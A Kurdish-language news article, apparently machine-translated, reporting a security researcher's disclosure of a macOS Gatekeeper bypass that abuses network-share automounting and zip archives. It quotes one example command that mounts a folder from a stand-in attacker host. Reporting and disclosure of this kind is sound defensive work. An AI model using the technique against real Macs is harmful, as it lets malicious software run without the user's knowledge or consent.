Sazkirina sepanek xerab li ser Mac-ê hêsan e. Apple piştî sê mehan jî xeletî rast nekiriye

27. 5. 2019

Lêkolînerê ewlehiyê Filippo Cavallarin li ser bloga xwe hişyariyek di derbarê xeletiya macOS 10.14.5 de şand. Ev di îhtîmala derbaskirina tevdîrên ewlehiyê yên Gatekeeper de pêk tê. Li gorî Cavallarin, wî di sibata vê salê de ji Apple re xeletî destnîşan kir, lê pargîdanî di nûvekirina herî dawî de ew rast nekir.

Gatekeeper ji hêla Apple ve hate pêşve xistin û di sala 2012-an de yekem car di pergala xebitandina sermaseya wê de hate bicîh kirin. Ew mekanîzmayek e ku rê li ber xebitandina sepanek bêyî agahdarî û razîbûna bikarhêner digire. Piştî ku hûn serîlêdanek dakêşin, Gatekeeper bixweber koda xwe kontrol dike da ku bibîne ka nermalava bi rêkûpêk ji hêla Apple ve hatî îmze kirin.

Di posta xweya blogê de, Cavallarin destnîşan dike ku Gatekeeper, ji hêla xwerû, hem hilanîna derveyî û hem jî parvekirina torê wekî cîhên ewledar dihesibîne. Ji ber vê yekê, her serîlêdana ku di van armancan de dimîne dikare bixweber were destpêkirin bêyî ku hûn di kontrola Gatekeeper de derbas bibin. Ev taybetmendî ye ku dikare bê agahiya bikarhêner ji bo destpêkirina nermalava xirab were bikar anîn.

Yek aliyek ku destûrê dide gihîştina bêdestûr taybetmendiya otomountê ye, ku destûrê dide bikarhêneran ku bixweber parvekirina torê bi tenê bi destnîşankirina rêyek ku bi "/net/" dest pê dike ve bihejînin. Wek mînak, Cavallarin rêça "ls /net/evil-attacker.com/sharedfolder/" vedibêje ku dikare bibe sedem ku pergala xebitandinê naveroka peldankek "parvekirî" li cîhek dûr a ku dibe ku xeternak be bar bike.

Hûn dikarin awayê xebitandina tehdîdê di vîdyoyê de temaşe bikin:

Faktorek din ev e ku heke arşîvek zip-ê ku tê de girêdanek taybetî ya ku berbi fonksiyona otomountê vedihewîne were parve kirin, ew ê ji hêla Gatekeeper ve neyê kontrol kirin. Bi vî rengî, mexdûr dikare bi hêsanî arşîva xerab dakêşîne û jê veke, bihêle ku êrîşkar hema hema her nermalava Mac-ê bêyî agahdariya bikarhêner bixebite. Finder, ku ji hêla xwerû hin pêvekan vedişêre, di heman demê de para xwe ji vê qelsbûnê jî heye.

Cavallarin di bloga xwe de diyar dike ku Apple di 22ê Sibata îsal de bal kişand ser qelsiya pergala xebitandina macOS. Lê di nîvê gulanê de, Apple bi Cavallarin re danûstendinê rawestand, ji ber vê yekê Cavallarin biryar da ku hemî tiştan eşkere bike.

Kanî: FCVL

Mijar: embarkirinî, bixweber, MacOS, video, Settings, karkirin, bikaranîvan, Bikaranînî, sêv

Gotûbêja gotarê

Navê te

Şîroveya te

Bi dagirtina daneyên jorîn, ez qebûl dikim ku pargîdaniya TEXT FACTORY s.r.o., nivîsgeha qeydkirî li Brno, Durďákova 336/29, Černá Pole, koda postê: 613 00, jimareya nasnameyê: 06157831, li Dadgeha Herêmî C, li beşa Brno, qeydkirî ye. , têxe 100399, dê daneyên min ên kesane yên ku di forma qeydê de ku ji hêla min ve hatî dagirtin li ser bingeha berjewendîyên rewa yên TEXT FACTORY s.r.o. li gorî xala 6 paragraf 1 nameya f) GDPR û bicihanîna erkên qanûnî (Benda 6, paragraf 1, tîpa c) GDPR), ji bo mebestên jêrîn: pêdivî ye ku destûrdayîna serdanên malperên ku ji hêla TEXT FACTORY s.r.o ve têne xebitandin da ku bi rengek çalak beşdarî gotarên hatine weşandin an di nav nîqaşê de bibin. foruman û bikaranîna mafên TEXT FACTORY s.r.o wek rêvebirê van forumên nîqaşê. Zêdetir agahdarî di derbarê hilberandina dane û mafên kesane de hûn dikarin tê de bibînin Dersên li ser parastina daneyên kesane. tevahiya nivîsê

Ew dikare bibe te eleqedar dike

Related